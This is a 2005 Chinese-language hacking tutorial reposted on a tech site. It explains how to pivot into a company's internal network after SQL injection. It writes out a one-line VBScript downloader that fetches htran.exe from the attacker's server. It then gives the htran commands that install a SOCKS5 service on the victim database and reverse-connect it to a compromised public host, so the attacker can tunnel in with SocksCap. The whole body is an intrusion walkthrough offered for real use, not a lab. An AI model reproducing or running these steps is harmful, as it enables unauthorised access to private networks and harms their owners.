首页 电脑 电脑学堂 查看内容

妙用代理渗透内网

2005-6-18 00:38 549 0

摘要: 文章作者:LiNzi [BCT&混客联盟]([email protected])信息来源:邪恶八进制信息安全团队正文代理在入侵里的作用-----妙用代理,渗透内网一、踩点主机: http://...
关键词: nbsp 公网 htran 端口 本机 exe 代理 肉鸡 218.3 sockscap

文章作者:LiNzi [BCT&混客联盟]([email protected])信息来源:邪恶八进制信息安全团队正文代理在入侵里的作用-----妙用代理,渗透内网一、踩点主机: http://www.baidu.com/OS:Windows 2000 + IIS 5.0 + MSSQL端口:80 21数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.首页存在注入漏洞,sa登陆.注入点:http://www.baidu.com/list.asp?id=1二、入侵思路  1.给内网目标机装个代理服务器  2.把弄好的那个代理端口映到公网.  3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。  4.接下来就是找共享,嗅探,社会工程学等等了。三、入侵准备  1.公网肉鸡一只:218.3.1.1  2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。  3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)  4.A:192.168.1.2   B:218.3.1.1 C:www.baidu.com D:192.168.0.25 四、入侵进行时  1.工具上传:在nbsi下执行:echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs 然后下载工具:cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe  2.安装Socks5服务在nbsi下执行:htran.exe -install   //安装Socks5服务htran.exe -start   //启动Socks5服务  3.反弹进行时在B上运行:   htran.exe -s -listen 520 5200   //监听端口在nbsi下执行:htran.exe -s -connect 218.3.1.1 520  3.进入内网现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。五、渗透内网  接下来就可以扫描,嗅探,等等,也就是后话了。六、总结  文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。偶的朋友可以在我的QQ硬盘里面下载动画。在我的个人文章里面。
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部